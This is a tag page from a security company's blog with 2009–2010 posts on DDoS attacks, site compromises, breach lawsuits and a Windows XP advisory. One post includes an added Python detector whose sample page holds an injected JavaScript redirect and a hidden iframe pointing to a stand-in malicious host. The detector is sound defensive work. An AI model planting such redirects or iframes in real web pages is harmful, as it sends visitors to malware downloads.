Posts Tagged ‘Intrusion Detection System’

North Korea is probably not to blame for the DDOS attacks in 2009

Tuesday, July 13th, 2010

Many of you might remember the distributed denial of service (DDOS) attacks that hampered several US websites about a year ago.  The source of the attacks appeared to be North Korea.  Now the US says there is no conclusive evidence that the attacks came from North Korea at all.  This is very common.  A good hacker will attack a system from a non-friendly nation state.  In other words, if you want to attack the U.S., use a North Korean computer to do it, because there is little if any cooperation in working to identify the culprit.  Of course the computer in North Korea would be controlled by one in the U.K., which would be controlled by one in Iran, etc.  These are the standard tactics experienced hackers use to keep from getting caught.  In this particular DDOS attack case, they say it is very unlikely that the culprit will ever be found.


Malicious websites continue to be hackers’ weapon of choice

Wednesday, July 7th, 2010

For a couple of years now I have been explaining how the weapon of choice for hackers is to use malicious websites.  It is exponentially easier for them to exploit systems this way, and these methods completely bypass traditional network firewalls and intrusion detection and prevention systems.  Take, for example, the series of attacks that were reported June 9, 2010.  Tens of thousands of webpages were found to be infected with malware.  The hackers discovered a vulnerability in Microsoft IIS that they could exploit in an automated way.  They then infected the websites to redirect visitors to malicious servers, where malware is installed on the user's desktop.  A redirection is very easy to do and takes only a single line of code.  More than 100,000 web pages were compromised in this attack alone.  These aren't just obscure sites either; they include The Wall Street Journal and many other sites that many of your users access every day.  Organizations need to think beyond the network-based intrusion detection system if they really want to protect their networks.
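Because a single injected line is all a redirect takes, one practical defence is to scan your own pages for off-site redirects and hidden includes that were not there before. The following is an added example, not code from the original post: it parses a constructed HTML sample and flags script sources, iframes, meta refreshes and JavaScript location assignments that point at hosts outside an assumed trusted list (the host names and the sample page are made up for illustration).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a legitimate CDN script, plus an injected one-line
# JavaScript redirect and a hidden iframe, like the compromised pages described above.
SAMPLE_HTML = """<html><head><title>News</title>
<script src="/static/site.js"></script>
<script src="http://cdn.example.com/lib.js"></script>
</head><body><p>Story text</p>
<script>window.location="http://malicious.example.net/x.php"</script>
<iframe src="http://malicious.example.net/drop.html" width="1" height="1"></iframe>
</body></html>"""

# Hosts the site legitimately loads content from (assumed; tune per site).
TRUSTED_HOSTS = {"cdn.example.com"}

# Matches assignments such as window.location="..." or location.href='...'.
REDIRECT_RE = re.compile(
    r"""(?:window\.)?(?:top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")


class RedirectFinder(HTMLParser):
    """Collects off-site script/iframe sources, meta refreshes and JS redirects."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []          # list of (kind, url) tuples
        self._in_script = False

    def _offsite(self, url):
        host = urlparse(url).hostname
        return host is not None and host not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if "src" in a and self._offsite(a["src"]):
                self.findings.append(("offsite-script", a["src"]))
        elif tag == "iframe" and "src" in a and self._offsite(a["src"]):
            self.findings.append(("offsite-iframe", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m and self._offsite(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands inline <script> bodies to handle_data as raw text.
        if self._in_script:
            for url in REDIRECT_RE.findall(data):
                if self._offsite(url):
                    self.findings.append(("js-redirect", url))


def find_redirects(html, trusted=TRUSTED_HOSTS):
    """Return the off-site redirect and include findings for one HTML document."""
    parser = RedirectFinder(trusted)
    parser.feed(html)
    return parser.findings
```

Run it against a saved copy of each page on a schedule and diff the findings against the previous run; a new entry on a page nobody edited is the signal worth investigating.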


Insurer claims non-liability in $3.3M data breach in Utah

Thursday, June 17th, 2010

My wife's personal information was among those in the 1.7 million record data breach of a local hospital in Utah.  In this case, backup tapes were stolen and later recovered, and they appeared not to have been used.  The hospital made a claim against the 3rd party provider, Perpetual Storage, whose mistake allowed the tapes to be stolen.  The claim is for $3.3 million, which the hospital said it had to pay in breach notification, credit monitoring, and other fees and costs associated with the breach.  Perpetual Storage had an insurance policy with Colorado Casualty Insurance Co. for information security breaches.  Colorado Casualty Insurance is saying that they are not liable and don't have to pay.  This is actually more common than you would think.  Just because you have an insurance provider doesn't mean it is a good risk mitigation strategy.  Research these companies carefully.  Find out which policies they have paid out on and which ones they haven't.  Read the fine print.  You could be paying for a policy that doesn't help you when you really need it.


Security Alert for Windows XP and Server 2003 Users

Tuesday, June 15th, 2010

Perimeter E-Security customers should be aware of a Microsoft Windows XP and Server 2003 exploit.  Exploit code has been posted online that shows attackers exactly how to compromise Windows XP and Server 2003 operating systems remotely.  This is possible due to a newly discovered security flaw in the way Windows Help and Support Center processes links.  These systems are supposed to work based on a fixed "whitelist" (a list of approved and authorized URLs); however, a security researcher at Google has shown how cyber criminals can add URLs to that whitelist.  As a result, an attacker could trick a user into following a link which could download any file the hacker would like.  The link and downloaded files run with the same permissions as the system's current user.  Many systems are configured by default with the user having administrative privileges.

Microsoft said, "Given the public disclosure of the details of the vulnerability, and how to exploit it, customers should be aware that broad attacks are likely."  This includes worms and a host of other malware that can automatically exploit this flaw through a variety of methods.

This is worse than most vulnerabilities we see.  Most vulnerabilities allow the system to be compromised in a specific way that may allow limited access or flexibility to the hacker.  This vulnerability makes it very easy for the cyber criminal to install any software they want as if they are the system administrator.

The solution?

  • There is no automated fix from Microsoft at this time. However, there is a manual "workaround."

The manual "workaround" involves editing the Registry.  Note: only experienced system administrators should manually edit the registry.  One wrong move can cause major stability and bootup problems.  The details for the registry edit can be found in Microsoft Security Advisory (2219475).
Beware that Microsoft says this may break links that you are trying to use in the Help and Support Center.  Microsoft has also posted a knowledge base article with a "fixit" here.

  • Stay tuned for more details from Microsoft

Microsoft is working on a patch. The Google researcher who discovered the flaw has released a fix; however, Microsoft says that this fix is easily bypassed and that users should not rely on the Google fix to resolve the problem.

While Microsoft is working on a patch, Perimeter E-Security continues to encourage users (especially those using XP) to create a limited user account for everyday computing.  Read more on this here. This will go a long way to protect systems from this exploit as well as many others we have seen in the past and will likely see in the future.

Contact us today at 800.234.2175 to talk with a security expert if you have further questions.

Tags: Windows XP exploit, Server 2003 exploit, vulnerability assessment tools, IT security, application penetration testing, managed service providers, intrusion detection system, security penetration testing


Federal Court Absolves a Firm That Exposed Social Security Numbers

Tuesday, June 15th, 2010

I was really glad to see this article: http://www.theregister.co.uk/2010/06/04/privacy_suit_absolution/

Lawsuits as a result of data breaches were out of control.  Sure, if a company has a breach that results in fraud or identity theft, I can understand why someone would want to sue the company.  I believe that if a breach occurs, and it is at all possible that identity theft or fraud might occur as a result, the company should offer credit monitoring services for the people affected.  But what I have never agreed with are those suits filed by individuals or groups where no identity theft has occurred, no fraud has occurred, and there is little or no chance of that happening, and still the company gets sued.  The Ninth US Circuit Court of Appeals has ruled that a man whose personal information, including his social security number, was exposed has no legal standing to seek damages BECAUSE HE DID NOT SUFFER MATERIALLY AS A RESULT OF THE BREACH.  This is how it should be.  I remember the class-action lawsuit against Veterans Affairs where they had to pay $20 million and no identity theft or fraud had occurred.  There were 26.5 million records exposed, so was everyone going to get $0.50 after the attorneys were paid?  These lawsuits have been ambulance-chasing lawyers' dreams for some time.  I am glad it is moving in another direction…


Thieves Flood Victim’s Phone with Calls to Loot Bank Accounts

Wednesday, May 19th, 2010

We often talk about the multipronged attacks that hackers use.  There is a new one that I saw recently that I thought was kind of interesting.  Criminals are clogging the telephone lines of financial institutions at the time they are attempting to initiate transactions.  Combining a denial of service (DOS) attack with their transaction offers the cyber thieves some advantages.  For transactions that would normally initiate a call to the individual for verification, that outbound call is not blocked or otherwise disrupted.  Additionally, the fraudsters can call and complain that they have been having telephone problems which may change an employee’s behavior to not follow strict policies and procedures.  If nothing else, this is something financial institutions should be aware of.


Answering Enterprise Security Questions

Monday, April 5th, 2010

I was asked to answer some specific questions for a reporter from Processor Magazine. They usually take bits and pieces of what I send, combined with input from others in the industry, to write their articles. So I thought I would list the questions here along with my full answers. At some point we will see what they use of these…
—————————

What does it take to keep the enterprise secure?
A lot more than people think. The idea that a firewall and anti-virus software are enough can only be described as reckless these days. Even intrusion detection and prevention systems can be easily bypassed by cyber criminals. Every organization is different and therefore there isn’t one answer that will keep all enterprises secure; but in general a layered security approach that includes information security defenses at the edge, in the core of the network, and on the endpoints is what is needed.

More important than the technologies or solutions employed is the way in which the enterprise gets the most out of those solutions. Centralized reporting and administration is key. Central repositories for compliance documents and audit documentation are critical. Policies, procedures and controls are paramount. The best thing an enterprise can do is work with a security expert who has their best interest in mind and can help them design and roll out a comprehensive security program that fits their requirements and budget.

Why should some applications (or classes of apps) NOT be used in the enterprise?
The term “applications” is so broad it is tough to answer this. In general, there are lots of applications that shouldn’t be used in an enterprise or closely managed and monitored if they are used. Some for productivity reasons. Others for security reasons. In my mind, what is more important than broadly banning applications (although there are times you should do that) is ensuring that systems only have the applications they need to perform their various functions. Any application can have vulnerabilities that can be exploited. Look at Adobe Acrobat for example. It is on more systems than any other application on the planet and has one of the highest rates of known, critical vulnerabilities. I don’t know of many enterprises that are going to ban Adobe Acrobat. So the more important thing is a process whereby you can patch the systems and keep them up to date to reduce the chance of compromise.

If you are referring to “applications” in the context of security solutions then I would answer differently. Simply stated, every organization is unique and information security must be implemented and somewhat customized for that particular organization to offer real value.

Why should others be used? Do you have any examples?

Again, if we are talking about security applications, one that I feel is really necessary these days but often not known or used is Host Based Intrusion Detection & Prevention (HIPS). This is software that goes right on the endpoints you want to protect. It does a great job with securing individual assets you want to protect at a higher level such as mission critical systems, customer databases, active directory services, or Internet accessible devices like an email server or web server. Web Content Filtering is another one that is absolutely necessary to help keep malware out of your organization. From a security standpoint, there are so many solutions an enterprise really needs to work with an expert to see what they need.

Why isn’t it the best idea to give end-users administrator rights?
There are lots of reasons for this: 1) the user may install software that could compromise the system and subsequently the entire network; 2) hackers who compromise the system may use these rights for other nefarious purposes.

How is mobility affecting the typical company’s security planning?
USB thumb drives, smart phones, iPods/iPhones, and other devices are causing major problems for enterprises. Malicious insiders can use these devices to steal massive amounts of information and walk out with it on their keychain or in their pocket. Careless and untrained insiders often spread malware, viruses, Trojans, worms and other things that can compromise or destroy systems and data. Mobile users such as telecommuters and travelers often have laptops stolen which have sensitive data on them. 45 of the 50 states have data breach disclosure laws that require an enterprise to publicly announce these incidents which can have a huge impact on revenue, customer retention, and stock prices, not to mention the fees and class action lawsuits that usually follow.

Is there such thing as too much or too little security?
Of course there is such a thing as too little security. I also believe that there can be too much security. If you have so many security solutions and technology that you aren’t able to keep up with the 24×7 management and monitoring, you aren’t getting what you need out of those solutions. You are wasting money. In the hands of properly qualified information security experts, it would be better. But there are so many solutions that people have deployed and they simply aren’t getting much value from them. Maybe they were at one time, but people keep adding solution after solution and technology after technology rather than doing a risk and gap analysis and finding out what they really need and then simply using those things. They will find they spend less in the end and get much better risk mitigation.


Is the Chinese Government Really Trying to Stop Cybercrime?

Monday, February 15th, 2010

The Chinese police have arrested 3 people in connection with a hacker site called Black Hawk.  This site had been (among other things) collecting membership fees totaling more than $1 million US.  This group has been known to threaten businesses such as Internet cafés, telling them they would be shut down with a DDOS attack if they didn't pay.  Ultimately the Chinese authorities found them by tracking the phone number given to these businesses for paying Black Hawk.

What is really happening here is that the Chinese government feels the pressure as a result of the Google hacks and wants to appear to be cracking down on cybercrime.  The truth is, these bozos at Black Hawk aren't anywhere near the level of sophistication of the Google hacks (which many believe were in fact Chinese state sponsored).  So this really is nothing more than perception management by the Chinese, which likely means they are feeling a bit of pressure but ultimately have no intention of changing their behavior at the government level.


SPAM Alert: Healthcare Reform Emails Include Malicious Software Download

Tuesday, September 22nd, 2009

Are you passionate about the current healthcare debate in the U.S.? If so, you may be willing to follow the instructions millions are getting in their email box. The SPAM email encourages people to download software they are told will launch a distributed denial of service (DDOS) attack against the White House. It is unclear whether the software actually launches the DDOS attack, but it is clear that the software is malicious in nature and has rootkit-like attributes.  While most SPAM and AV filters are catching this, it is still important to be careful!


Government Sponsored DDOS

Thursday, July 9th, 2009

According to an article by the Associated Press, North Korea may be behind a series of distributed denial of service (DDOS) attacks that began on July 4 against several government, news, and other agencies.  The U.S. government at this time is not discussing the attacks.  The extent of the attacks was also unclear.  In other words, we don't know if the sites were completely taken offline or just saturated with attack requests. A more recent article talks about which agencies were able to fend off the attacks well, while others struggled during the holiday weekend.

While many elements of security are moving towards the desktop, things like DDOS attacks can only be stopped at the service provider level or by large, sophisticated enterprises.  Service providers are beginning to prepare themselves better for these types of attacks, which most security experts expect to increase dramatically in the future.

Government sponsored DDOS attacks… in other words, government sponsored cyber terrorism, seem to be becoming more common as well.  There have been a few examples in the past.  One of the more recent is the attacks against Estonia by (what is believed by most to be) the Russian government.  Cyber terrorism will be a powerful weapon of the future.


DDOS Attack Against Domain Register DNS

Tuesday, June 9th, 2009

In a previous post, I mentioned how botnets have grown so much in size and sophistication that we should gear up for some real attacks coming from them.  I think we will begin to see more attacks like the one that happened a couple of weeks ago in China: a DDOS attack against a popular domain registrar in China.  The DDOS attack was specifically against the domain name servers (DNS).  The DNS servers resolve the friendly name like www.mydomain.com to the numbered IP address that is assigned to the web server.  When a system like this comes under attack, others cannot reach it and therefore cannot resolve the name.  Effectively this blocks their access to the site… even though the site itself wasn't attacked.  As time goes on, and with the continual growth of botnets, we will see more attacks like this.

Article


41 Percent of Software on PCs Worldwide is Pirated

Friday, May 29th, 2009

The Business Software Alliance (BSA) recently released statistics showing that the percentage of pirated software grew from 38 percent in 2007 to 41 percent in 2008.  The US has a low percentage compared to most nations.

In my opinion, this isn’t about economic and revenue losses, but rather a security issue.  Most pirated versions of software cannot receive updates and patches.  This leaves a lot of vulnerable systems to be attacked, exploited, and then used for nefarious purposes.

Vint Cerf estimated that one in four computers worldwide has command and control software that makes it part of a botnet.  Of course no one knows the real figure.  Most other security professionals estimate it somewhere between one percent and 10 percent.  Either way, it is a big number.  Having that many systems under the control of others can have devastating consequences.  This is why we have the volume of SPAM we have today.  This is how countries can be (and have been) taken offline through DDOS attacks.  The problem with pirated software is that those systems become a plague to all the legitimate systems out there.  This will grow to be an enormous problem in the near future.

http://www.msnbc.msn.com/id/30699735/